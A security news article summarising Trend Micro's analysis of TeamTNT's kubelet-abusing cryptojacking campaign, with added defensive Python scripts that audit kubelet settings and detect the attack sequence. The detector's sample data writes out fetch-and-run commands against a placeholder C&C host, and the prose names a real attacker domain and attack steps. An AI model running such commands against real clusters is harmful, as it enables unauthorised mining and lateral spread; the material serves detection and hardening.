TeamTNT threat actor compromised nearly 50,000 IPs across multiple Kubernetes clusters

 


Researchers at Trend Micro shared details about a cryptojacking campaign aimed at Kubernetes clusters. They discovered that TeamTNT, a threat actor behind this campaign, compromised nearly 50,000 IP addresses, with most of the compromised nodes located in China and the US.

Trend Micro analyzed data belonging to a few TeamTNT servers, which gave the research team an insight into what tools and techniques the group used in the observed campaign.

The TeamTNT gang has been active since April 2020 and has been known to target Docker and Kubernetes installs. TeamTNT usually scans the internet in search of misconfigured Docker containers and Kubernetes installations and infects them with a malicious cryptocurrency miner and a DDoS malware.

“We have found and confirmed close to 50,000 IPs compromised by this attack perpetrated by TeamTNT across multiple clusters. Several IPs were repeatedly exploited during the timeframe of the episode, occurring between March and May. Most of the compromised nodes were from China and the US — identified in the ISP (Internet Service Provider) list, which had Chinese and US-based providers as the highest hits, including some CSPs (Cloud Service Providers),” Trend Micro wrote in its recent report.

The researchers analyzed one of the scripts employed in the attacks against the Kubernetes clusters they collected from a server (kube[.]lateral[.]sh) used by the TeamTNT group. At the time of the investigation the script had low detection rates in VirusTotal, Trend Micro said.

The attack begins with the threat actor attempting to disable the bash history on the target host and defining environment variables that point at resources on their command and control (C&C) server, such as the script that later installs the crypto miner and the XMRig Monero miner binary.

The script then installs two open-source tools: the network scanning tool masscan (written in C) and the banner-grabbing tool ZGrab (written in Go), which is deprecated.

The next stage of the attack involves installing the attacker’s IRC bot, based on another well-known IRC bot called Kaiten, which is stored in the /tmp folder under the name kube.c to avoid suspicion.

TeamTNT uses the Masscan scanner to scan the internal network of the targeted Kubernetes cluster for unsecured or misconfigured Kubelet agents. The kubelet API port (10250) should not be exposed to the internet, but TeamTNT compromises the kubelet only after gaining access to the environment, so the scans are run internally.
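The misconfigurations that make a kubelet reachable the way the report describes are a handful of KubeletConfiguration settings. The following audit script is an added example, not code from Trend Micro or from the Kubernetes project: it takes a parsed kubelet configuration (the dict that yaml.safe_load would return for the config file) and reports the settings that would let an unauthenticated client reach endpoints such as /runningpods and /run. The two sample configurations are constructed for illustration; the field names (authentication.anonymous.enabled, authentication.webhook.enabled, authentication.x509.clientCAFile, authorization.mode, readOnlyPort, enableDebuggingHandlers) are real KubeletConfiguration fields.

```python
"""Audit a KubeletConfiguration for the settings that expose the kubelet API.

Configs are plain dicts (what yaml.safe_load returns for the kubelet config
file).  WEAK and HARDENED below are constructed samples, not real cluster data.
"""

# Constructed: a kubelet that answers anyone on 10250 and also keeps the legacy
# unauthenticated read-only port open.
WEAK = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "port": 10250,
    "readOnlyPort": 10255,
    "authentication": {"anonymous": {"enabled": True}, "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "enableDebuggingHandlers": True,
}

# Constructed: the same kubelet with authentication and authorization delegated
# to the API server.  Debugging handlers stay on because kubectl exec/logs
# need them; the point is that /run is then gated by the Webhook authorizer.
HARDENED = {
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "port": 10250,
    "readOnlyPort": 0,
    "authentication": {
        "anonymous": {"enabled": False},
        "webhook": {"enabled": True},
        "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"},  # placeholder path
    },
    "authorization": {"mode": "Webhook"},
    "enableDebuggingHandlers": True,
}


def get(cfg, *path, default=None):
    """Walk nested dict keys; return `default` when any key is missing."""
    cur = cfg
    for key in path:
        if not isinstance(cur, dict) or key not in cur:
            return default
        cur = cur[key]
    return cur


def audit_kubelet_config(cfg):
    """Return (severity, message) findings, highest-impact settings first."""
    findings = []
    if get(cfg, "authentication", "anonymous", "enabled") is not False:
        findings.append(("high", "authentication.anonymous.enabled is not explicitly "
                                 "false: unauthenticated clients can call the kubelet API"))
    mode = get(cfg, "authorization", "mode")
    if mode != "Webhook":
        findings.append(("high", f"authorization.mode is {mode!r}; expected 'Webhook' so the "
                                 "API server decides who may call /run and /runningpods"))
    if get(cfg, "authentication", "webhook", "enabled") is not True:
        findings.append(("medium", "authentication.webhook.enabled is not true: bearer "
                                   "tokens are not validated against the API server"))
    if not get(cfg, "authentication", "x509", "clientCAFile"):
        findings.append(("medium", "authentication.x509.clientCAFile is unset: client "
                                   "certificates cannot be verified"))
    # readOnlyPort defaults to 0 (disabled) in the config file; 10255 is the legacy port.
    ro = get(cfg, "readOnlyPort", default=0)
    if ro != 0:
        findings.append(("medium", f"readOnlyPort {ro} serves pod listings without "
                                   "authentication; set it to 0"))
    if get(cfg, "enableDebuggingHandlers", default=True):
        findings.append(("info", "enableDebuggingHandlers is on: /run, /exec and related "
                                 "endpoints exist, so the authorization settings above "
                                 "are what protects them"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("WEAK", WEAK), ("HARDENED", HARDENED)):
        print(f"== {name}")
        for severity, message in audit_kubelet_config(cfg):
            print(f"[{severity}] {message}")
```

Run it as a pre-deployment check against the rendered kubelet config on each node; the "info" line is expected on any node where kubectl exec must keep working, and the two "high" findings are the ones that turn an internal masscan hit on port 10250 into a usable foothold.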

“In the last part of the script, we can see a function — kube_pwn() — being declared. As seen from the code, the kube_pwn function uses Masscan to check any hosts with port 10250 open […] the first thing the kube_pwn() function does is to get some information from the Kubelet API via the /runningpods endpoint, filtering the namespace, pod name and container names,” Trend Micro explained.

“As we can see from the kubelet server.go code above, the API endpoint /runningpods does exactly what the endpoint says, it lists the running pods. First, the kube_pwn() function lists all the current running pods inside the node in a JSON format.”

For each container running on each node, the kube_pwn() function takes advantage of the /run endpoint on the kubelet API to run the following commands:

1. Updates the package index of the container.

2. Installs the following packages: bash, wget and curl.

3. Downloads a shell script called setup_xmr.sh from the TeamTNT C&C server and saves it in the tmp folder.

4. Executes the script to start mining for the Monero cryptocurrency.
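The four steps above form a recognisable sequence: an enumeration call to /runningpods followed by /run calls to the same kubelet that install download tools, fetch a script and execute it from tmp. The detector below is an added example, not part of the Trend Micro report; it runs over constructed request records in a hypothetical capture format (source address, timestamp, method, path and the command sent to /run). The kubelet itself does not log request bodies, so in practice such records would have to come from a sidecar proxy or network capture, which is assumed here and not shown. The C&C hostname in the sample data is a placeholder.

```python
"""Flag the kubelet /runningpods -> /run abuse sequence described above.

Records are constructed dicts in a hypothetical capture format:
    {"src": client IP, "ts": unix seconds, "method": ..., "path": ..., "cmd": ...}
"""
import re
from collections import defaultdict

# kubelet debugging endpoint: POST /run/{namespace}/{pod}/{container}
RUN_PATH = re.compile(r"^/run/(?P<ns>[^/]+)/(?P<pod>[^/]+)/(?P<container>[^/]+)/?$")
ENUM_PATH = re.compile(r"^/runningpods/?$")

# One indicator per step of the install routine (the package-index update on
# its own is too common to count).
INDICATORS = {
    "installs-download-tools": re.compile(
        r"\b(apt(-get)?|apk|yum|dnf)\b.*\b(install|add)\b.*\b(curl|wget)\b"),
    "fetches-remote-script": re.compile(r"\b(curl|wget)\b[^;|&]*\bhttps?://\S+\.sh\b"),
    "runs-script-from-tmp": re.compile(r"\b(bash|sh)\s+/tmp/\S+\.sh\b"),
}

# Constructed sample capture: one attacker-like sequence, one exec without
# prior enumeration, and two benign requests (monitoring agent, an admin shell).
REQUESTS = [
    {"src": "10.42.0.17", "ts": 100, "method": "GET", "path": "/runningpods/", "cmd": ""},
    {"src": "10.42.0.17", "ts": 101, "method": "POST", "path": "/run/default/web-6b9/nginx",
     "cmd": "apt-get update"},
    {"src": "10.42.0.17", "ts": 102, "method": "POST", "path": "/run/default/web-6b9/nginx",
     "cmd": "apt-get install -y bash wget curl"},
    {"src": "10.42.0.17", "ts": 103, "method": "POST", "path": "/run/default/web-6b9/nginx",
     "cmd": "curl -s http://c2.example.invalid/setup_xmr.sh -o /tmp/setup_xmr.sh"},
    {"src": "10.42.0.17", "ts": 104, "method": "POST", "path": "/run/default/web-6b9/nginx",
     "cmd": "bash /tmp/setup_xmr.sh"},
    {"src": "10.42.0.5", "ts": 200, "method": "GET", "path": "/stats/summary", "cmd": ""},
    {"src": "10.42.0.9", "ts": 300, "method": "POST", "path": "/run/kube-system/dbg/shell",
     "cmd": "ls /var/log"},
    {"src": "10.42.0.31", "ts": 400, "method": "POST", "path": "/run/default/job-1/worker",
     "cmd": "sh /tmp/update.sh"},
]


def classify_cmd(cmd):
    """Return the names of every indicator that matches one exec'd command."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def analyze(records, window=300):
    """Group requests by source and score the enumerate-then-exec pattern.

    "high":   /runningpods enumeration followed within `window` seconds by a
              /run command matching any indicator
    "medium": indicator-matching /run command with no prior enumeration
    Sources with only benign requests produce no finding.
    """
    by_src = defaultdict(list)
    for r in sorted(records, key=lambda r: r["ts"]):
        by_src[r["src"]].append(r)

    findings = []
    for src, reqs in by_src.items():
        enum_times = [r["ts"] for r in reqs
                      if r["method"] == "GET" and ENUM_PATH.match(r["path"])]
        hits, containers, preceded = [], set(), False
        for r in reqs:
            m = RUN_PATH.match(r["path"])
            if r["method"] != "POST" or not m:
                continue
            tags = classify_cmd(r.get("cmd", ""))
            if not tags:
                continue
            hits.extend(tags)
            containers.add(f"{m['ns']}/{m['pod']}/{m['container']}")
            if any(0 <= r["ts"] - t <= window for t in enum_times):
                preceded = True
        if hits:
            findings.append({
                "src": src,
                "severity": "high" if preceded else "medium",
                "indicators": sorted(set(hits)),
                "containers": sorted(containers),
            })
    return findings


if __name__ == "__main__":
    for f in analyze(REQUESTS):
        print(f)
```

The worm-like spread the report describes shows up in this model as the same source producing "high" findings against several kubelets in a short window, so in a real deployment the source address is the field to pivot on once a finding fires.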

“To finish this, they run the same kube_pwn() function we analyzed against a series of internal IP ranges looking for new targets to compromise, with similar behavior to a worm,” Trend Micro said.

“The high number of targets shows that TeamTNT is still expanding its reach (especially in cloud environments) and perhaps infrastructure since the group can monetize a more significant amount from their campaigns with more potential victims. The group’s activities add to the number of potential threats that Kubernetes users face.”

